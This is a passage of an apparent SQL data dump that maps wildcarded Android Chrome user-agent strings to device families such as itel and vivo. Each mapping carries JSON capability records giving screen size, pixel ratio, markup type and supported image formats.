Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; itel it1409) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; itel it1505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; itel it1506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; itel it1507) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; itel it1508) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; itel it1550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; itel it1551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; itel it1655) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; m1 note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; m2 note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; m2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; m3 note) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; m3 note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; m3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; meanIT Q9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; msm8909) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; myPhone Q-Smart LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; myPhone VENUM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; myPhone_L_Line) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; prime) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; smartphone) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; thl T6C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; verykoolS4008) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; verykoolS5030) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo 1613) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo V1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo V3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo V3M A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo V3Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo X5Pro D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo X5Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo X7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo X7Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo Xplay5A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo Y21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo Y21L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo Y31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo Y31A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo Y31L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo Y35) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo Y37) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo Y51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo Y51A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; vivo Y51L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; wt88047) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; xx 1 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; xx 4i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; xx Pro 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; xx X507) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":699,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*;8079) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 0PAJ5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 0PM92) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 402SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 4034A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 4034D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 4034E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 4034F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 4034G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 4034X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 4049D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 4049G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 4049X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 4055U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 4E4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 4U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5010D) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5010D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5010E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5010G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5010S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5010U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5010X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5012F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5012G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 501SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5023E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5023F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5027B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 503KC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5041) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5041D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5044A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5044D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5044O) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 